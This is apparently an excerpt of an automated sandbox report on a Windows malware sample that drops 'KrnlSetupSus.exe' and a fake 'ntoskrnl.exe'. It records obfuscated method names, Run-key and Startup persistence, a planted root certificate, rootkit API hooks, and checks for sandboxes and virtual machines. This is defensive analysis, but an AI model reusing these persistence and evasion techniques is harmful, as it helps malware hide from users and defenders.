                              Source: KrnlSetupSus.exe.0.dr, fBE1wflwwjJOP1BboN3oP.csHigh entropy of concatenated method names: 'YD0QCSyqPyrsjswITvyc0', 'F4ZGWRWk4BZtS1nHIrJoM', 'JV1vJlWqNGKTYu462VICF', 'Tsa3qapValzJx3jV7kJRC', 'PSDL1hLudsVOQbbVaV1Ou', '_5UkLRybGfm6953NTMwCch', 'iSkYSAOPrdhrNkZZh8yhq', 'XQ40cR7S4gZaA89F6Dlrf', 'SRFpPA3NOPbiTTzozqFUt', '_2rM7AGNhDvP80KL8aaGC5'
                              Source: KrnlSetupSus.exe.0.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csHigh entropy of concatenated method names: 'Y6S3kL36Hhi6Szxbaj5z8VUc7sfdv7uyv94sqgvyBeGZELv8NjXahMovEPMValZLRFmzxkbA5RYb', 'XMskKsZQ9xFCDyWv1SHyit5MgjJ9eXAPgl7rq9zocjRtYNs7ZTqJBnKwpZYk3Tjg7rv8gsTdiSz6', 'IuE5JWtWX7HFtcdEkmeLXOGSGvEac8otBZ8VrB7hcFItnfZyvxNUwrGatrgiV', 'J2dXMjGxtzHtGu95nwioA8GXiUZzxw9IVzHT6uy7a6wVG2Dv8y9nILQKtkvTH', '_5KTvCTOAK8L5ko8fjIS43bGsdndlEbKw5kbl98Nb1lZnB4duTz0K1I2LlX7sB', 'UeEZcneYsNnSeeAIZo1ffRvkfTugfxvXkoNUmaSKo7U7ifDU6066uKRT3r5h8', 'X5WDd7gjKzGrWNWDILbOkkcP8yF5HqxbM9XV4N2uuH2ZQkytMncHp8s8xMM05', '_9TqFNy41v0GiP4F1cETXtPtqFnfoEYCpQyaaD7SJ9TOVInQp5VgICBRYDRZrM', 'HQuHRHRNRfM6PqMn65cZcAsVxDrWU96TV7WGulbL7V1W4ipHP3qgvZ9igMx7t', 'rjP5LEPeLfi3iwoWJZhMhMHVIq2WMWMypmKPM64aivEKzGy5C7GgI3y3N3vPR'
                              Source: KrnlSetupSus.exe.0.dr, n2VU5KGecv5aHTrU9Mb0Y.csHigh entropy of concatenated method names: 'tQTtE8TgSIaIHHMv1vHgk', 'poMSvK625dXjX4DLt1GoPxkDF4gmzUj1m2gXBXLja1YnsNXg2aGONjOlYMWJPU94pfzARuv5uUboODqA9', 'VkyPJkFmps3stXrDTV3HiuHEKbmdyK0Sdd02RIUBO8CnlaFkj2g41fkUgvR2Xr8IXfL3FBnNbsbpCSwQy', 'gTQLiUl5jHM6EM5h4OLGsbKAgcYt5k7y7EyfgXCpoOwwdGCnQJ5eqPF9ubElDaVgeC7sXmlQGvGaYlBA5', '_2pr1umXGVGVA4sjOu8o81mXfEsHV8SfL326eNWGWUpTQrDHtiE9LROmr75Xj46jyM4Y8A1BTekoVBhGCG'
                              Source: KrnlSetupSus.exe.0.dr, iRivwccr5pOuk6KKkp3t6eiIuTgZTwKJ8CfW.csHigh entropy of concatenated method names: '_2cm4dcpEA29Z6snowz1i3MloVubUZygEkOvk', 'hjsXV3YkekSdVTRTKUgBkabyxqXUtATdRbAg', 'WEz5LK16Y9RN2LoTju2Vf2AvCuxMuijFZ8YJ', 'sjBFheflFg6hfHtLrQaGsQqQcSl9ASPJAW2K', 'Ek7zboftpByzlUVnF7y27HEcj9nQalRUglxd', 'mqrsPQD1SKmKewROMjcFcnJyOxgaUA5KLfD2', 'iJJyJXC3nry792reNxn1j', 'xzF7fJAqbsXP9Fxbb3FO6', 'Qc0feZTjFDxANHPoAdAwf', 'Da7RH067eSxE5WmxXlO3a'
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.csHigh entropy of concatenated method names: 'bZELyPv3sja3iEp6tfftvGVG1y3nZhWPyb4Yrb1ZrUWizO4DUyMVnkotU2D8KPtY645dXWVnGMgLOLlZ6VxKpNMAyewggN', 'ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u', 'tdkTdJfS3CUjbu0zLiwC0OS0E2inThepfOryywwLmCKe6tVR5MtPJnk3lILmsCBcccyVPtD5SnoxRVyb89Ls0cvzS88htN', 'yhlg7wWe2xBtm0uQU4gO0padLD4ICYPpCGSKC2E0mqps610BIgpa3IqJRmwuF2zhCXFYDguhvqwlCcBLBI4N3UhMuqoFI3', '_9IbWxPrVmeYs17G1W7t9s5KsZohJc8RouvBX991UbIMDkl2cwdC2PnNBfJqBk0KmCiR5GdIHDXVhRdDCnpMYnOienu6VeO', '_8SXDO5zQtqSdvrNA62QJFzFSUpPW53hMpgMj1OgTIQfZmLQLgn0GGrrlyDxT5AVtuJE4sYTk0UZU2jsa7Fynpm6e6F17EX', 'mb359UbXwCtCUiRSgJSuNvZ8imfLN3qpjfOUsebZqacEQsV9owqeyAj6go0CZcHjBBbWtRiCLfzKB1lSIz8CzjuG6ZcwvR', 'sasNNjZ3RAo1mY0lB5QmByitrq1TFWRqxLV5', 'UI6Mvbuu37198ktvpls3iZmWuR4MY8VKuvvZ', '_9NrUYW2N1UCvJFwXVkljmqrPmK0PyGZU8xAh'
                              Source: KrnlSetupSus.exe.0.dr, WbZaHv4xuPSeZw2uAq4Js.csHigh entropy of concatenated method names: 'p1ZObOBDiiCdmpAHuZPCz', 'uKfwK6UHGlWnwlTxMuyZu', 'hTgbJvszj5Fn2Yyw4coaY', 'tEyVsPFLaQbs1Ms4fJWS2', 'LxcIxEh3wO4tfR6EFFwO7z97nFh4SjXFXVTYrnSSm1z1FiiWLY0c9yLV1WJZJDTiCQoO5jTAw3A293s81', 'Q7uLhPFA9x07ddwqXDvd9rqN2YsJqMOpj0NXCWUE0s6Bs7E3K2Eui4PN2a0uXX22DQuaV3AP2F43oPYwA', '_4OR978IwofAET9FeEwdugcsmibi1f3keYmqdsfnGQcQ93wtF4rS4QeySF930AiCg74qm3G77HPRLXWZEe', 'OnxXct0BLVJNUY42bfm3BlHNEzzVYn6W2V3GhtRhzP5LcciACAZEw75Iias6hEcYaq1gOAgxbmSdq1TVh', 'vfPucQzH31Aaj7pIXhk7iaCn3K9a5CctLzj39d2o7QgCsyIJ4WAe4i00U09H9DicnPzoeege2jtXVCYFC', '_8Bf9eZZmohMkIkrERgdVHYTqUPFJwRUUyPkaZMi84VgqQnNImGK58edVhnpkppTmI7oRV1FJVUXvSJtCz'
                              Source: KrnlSetupSus.exe.0.dr, gbSyzXQhgHNZmmbfmM8GltxWX51PeZR1IbpV.csHigh entropy of concatenated method names: '_0Tn8eiUBotyOjBtK4ys8Uf813ry6LjWuikS0', 'C8ADOhQ3KeBvCXnKAjGv6J3XM7TCpsX4tVM2lsThPwpStVfgUL06JOfrYHd0wA5', 'PsdvIju2ypJ9PqqIWRqI9KvAnEXBoZmjOnRut1tXv2U4GnESElS3ewxafh4B1Di', '_3eYv3dv27en6o2hRGw5Nnr60o09PnZdx3R0p2DzYRlLZrEX6pr5ENSPxVNOv1ik', 'BCVkibtgWDAggWeWvVrNeQzByt9mUF3s46FIvB9nfQkeB5Dd9dzFXC4NcIdq4Pz'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, An0DSGyo344mWvaOGRrvwB3xPQTerGsbqj4hWP87gE2xj6Xf861To.csHigh entropy of concatenated method names: 'vHFFmttLONVktUsWUA3AJGFdJWwH3LXW3xXjpw21bBBfogjdXwixL', 'pDig5htp97pCUFbUOWgCFQEhPPMCswUZeqO0OvckzS0LVMk2IbATt', '_3zX6h0rbxTkLHYQL5aUcLZHZ7UzQhII1RWwOwCq7kahd95MljO1Y8', 'qWQJ4sEDsHWDMdrXMBkWJJMAR2ZJYuHYUXWKncElQ', 'gq4Qkyfs4qJPW0ELlZ3kPt15qUZ0cxiBsFeAPeQI5', 'RFBbtf7HwHMb6tA0XzPhNh0zTs2JPusWSKjbkqzCH', 'Ggm60FFRlbFETKfaMX2uqzTwCAlOOfzdpr80PQzQt', 'SfbFF1YXwOThpiQCsrqLkaZcTWr8qgkCV0BH53CKx', 'o54yd07s4Ybrh2mMTQmPy9G13JW9ciIrO77zM8H2u', 'pnE5wwk6209HgsLniyDfSldBWArhFkd7jbxxWqdyQ'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, g59OujVBB7MZJrqDCW5gf5pEZBK5CRLNy2qq.csHigh entropy of concatenated method names: 'Udog1cHZ1AZJdMqeZsOj2t0bHbbfTPyLXdZe', 'TTYQ8X2ipUHHOkpu8pFoVFvSsdMubt5OxO8w', 'HT2IJGVpP7zoCQKtrmw3udmHXeOWC8OpeL8N', 'M9quXEQLDHFgQdGrsqwRWJUMnoQCKJWjSr19mi7k424vOIRs8Fm0VrYwzEFpRaL', '_1R6sIwUFYAWIMc0rzfxjghWNfbNjvLbVc8IJBPCINsJKoQXG1mhyq3NKOhHPeSr', 'rDsj1OqcOyybEuCLD2FFi2BigjKCDFhW9PjBvEGOqBEnsU9SFadJtQkG7xaHR7X', 'qIJHJB3QXPOXWlGDcFiDAmtKitBmvx9A5fUf7AI0uqYmSXmbBJoJerF6poK7WhD', 'GHUFd804U76ooo0qpMgfZJtEwg6rVUVsmOdRDm6D4eJcy5wWm2iRwOzKSeaZU2v', 'HnLd5xAdbGZEMuhGUGFFabByTNuTI0ppEXue9G35Rm7RfXZT', 'Wbg4wkSPngGqJ8xephornvch2JT70vBDY2ex0FEFCEq8NqbS'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, B9E2fnMLcC12guuhzPwoS77zgW1ZgEiELCEEKaw2Klq5.csHigh entropy of concatenated method names: 'nvIwktLoxcNX1Yoqnf7SQGBzq9bmI6sAxpElhIxlHTTf', 'WAB40fyGIXFhlujIcnNSF6ImInBnekudbmbqIGmAsaQw', 'kZ8CdUlCp9uvwjQ3Qbw7TWFHyuInWi0dQnSIix6anlMJaie9o45d4PFFYcqaBFiqYovX8AZKjN8V', 'RKBr7RPx5MBcrYIh4IgNXmAPocRcxQIkES4vegZIf1KcSH7FtVgMm7LCGj2zT2NxkMkCki6Wu42g', '_2r1fsEY49aYbWGhzoGwNPvx1xQHfdn8rwpgaNoXz0Tuwx8n9y3w3rfGvPwPBcoQOVdGokzb2Yyq3', 's5g5xnN65pkcCGULZ4wfhDYsp3th2DWLXvhEsmb3JX3mt5g4QxSEY0anSxtvAHY62UNFQHi0BqM7', '_4OPzvYsw9YIZjEk0ugcA2t02sl6ai564i56NGeOWtgK3Xtr8qAwUFsInykU1M6qA3oGUuKoAzkN0', 'IbOlDrDw4uKuYEJJ7oENUTQVkFnyEAdK2E0nTN4HJMXZvdnUqL6A7xGIi5ecKEQ5qrimIPMJJsmC', 'E1CYunwxKQKpCDj7UCg7Iop0sQjq8FSZVg8O0lpyuUDw8tgLwTI5T6Ubs3ehtnKDgbDsnsr7nIlr', 'COf9r32smfr6yi32UMkNpnw81JfdBdmdEcHppRVvIgTUxLItsohhP6bWoT7cTmmGPTaO3XuntYsy'

                              Persistence and Installation Behavior

                              Source: C:\Windows\System32\lsass.exe  File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                              Source: C:\Windows\System32\lsass.exe  Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                              Source: C:\ProgramData\KrnlSetupSus.exe  File created: C:\ProgramData\ntoskrnl.exe
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe  File created: C:\ProgramData\KrnlSetupSus.exe
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe  File created: C:\ProgramData\Install.exe
                              Source: C:\ProgramData\KrnlSetupSus.exe  File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk
                              Source: C:\ProgramData\KrnlSetupSus.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ntoskrnl

                              Hooking and other Techniques for Hiding and Protection

                              Source: explorer.exe  IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                              Source: explorer.exe  IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                              Source: explorer.exe  IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: explorer.exe  User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                              Source: C:\ProgramData\Install.exe  Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $77stager
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe  Process information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\KrnlSetupSus.exe  Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                              Source: C:\ProgramData\KrnlSetupSus.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl.exe.3.dr, KrnlSetupSus.exe.0.dr | Binary or memory string: SBIEDLL.DLL
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Memory allocated: 2730000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Memory allocated: 1A930000 memory reserve | memory write watch
                              Source: C:\ProgramData\KrnlSetupSus.exe | Memory allocated: 1300000 memory reserve | memory write watch
                              Source: C:\ProgramData\KrnlSetupSus.exe | Memory allocated: 1ADE0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599890Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599781Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599672Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599562Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599448Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599338Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599233Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599124Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 599015Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598906Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598796Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598687Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598578Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598465Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598359Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598248Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 598115Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597999Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597890Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597777Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597672Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597562Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeThread delayed: delay time: 597452Jump to behavior
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597343
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597229
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597125
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597014
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596906
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596797
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596687
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596578
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596468
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596345
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596218
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596109
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596000
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 595889
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 595125
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594998
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594890
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594781
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594671
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594562
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594453
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594343
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594234
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594124
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594014
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 593906
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 593796
Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 593687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\KrnlSetupSus.exe | Window / User API: threadDelayed 7011
Source: C:\ProgramData\KrnlSetupSus.exe | Window / User API: threadDelayed 2794
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4048
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4222
Source: C:\Windows\System32\dllhost.exe | Window / User API: threadDelayed 376
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 7857
Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 2142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7178
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2500
Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 9831
Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 9859
Source: C:\Windows\System32\dllhost.exe | Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_6-8067)
Source: C:\ProgramData\Install.exe | Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_2-245)
Source: C:\Windows\System32\dllhost.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_6-9531)
Source: C:\Windows\System32\dllhost.exe | Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess (graph_6-8075)
Source: C:\Windows\System32\dllhost.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_6-8011)
Source: C:\Windows\System32\lsass.exe | API coverage: 6.9 %
Source: C:\Windows\System32\svchost.exe | API coverage: 5.3 %
Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
Source: C:\Windows\System32\svchost.exe | API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe | API coverage: 5.9 %
Source: C:\Windows\System32\svchost.exe | API coverage: 5.3 %
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe TID: 7340 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -34126476536362649s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599890s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599781s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599672s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599562s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599448s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599338s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599233s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599124s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -599015s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -598906s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -598796s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -598687s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -598578s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -598465s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -598359s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -598248s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -598115s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597999s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597890s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597777s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597672s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597562s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597452s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597343s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597229s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597125s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -597014s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596906s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596797s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596687s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596578s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596468s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596345s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596218s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596109s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -596000s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -595889s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -595125s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594998s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594890s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594781s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594671s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594562s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594453s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594343s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594234s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594124s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -594014s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -593906s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -593796s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe TID: 1976 | Thread sleep time: -593687s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 | Thread sleep count: 4048 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 | Thread sleep count: 4222 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7700 | Thread sleep count: 376 > 30
Source: C:\Windows\System32\dllhost.exe TID: 7700 | Thread sleep time: -37600s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7684 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7832 | Thread sleep count: 7857 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7832 | Thread sleep time: -7857000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7832 | Thread sleep count: 2142 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7832 | Thread sleep time: -2142000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836 | Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7856 | Thread sleep count: 9831 > 30
Source: C:\Windows\System32\lsass.exe TID: 7856 | Thread sleep time: -9831000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7856 | Thread sleep count: 108 > 30
Source: C:\Windows\System32\lsass.exe TID: 7856 | Thread sleep time: -108000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7868 | Thread sleep count: 245 > 30
Source: C:\Windows\System32\svchost.exe TID: 7868 | Thread sleep time: -245000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7912 | Thread sleep count: 9859 > 30
Source: C:\Windows\System32\dwm.exe TID: 7912 | Thread sleep time: -9859000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7932 | Thread sleep count: 258 > 30
Source: C:\Windows\System32\svchost.exe TID: 7932 | Thread sleep time: -258000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7992 | Thread sleep count: 259 > 30
Source: C:\Windows\System32\svchost.exe TID: 7992 | Thread sleep time: -259000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8012 | Thread sleep count: 97 > 30
Source: C:\Windows\System32\svchost.exe TID: 8012 | Thread sleep time: -97000s >= -30000s
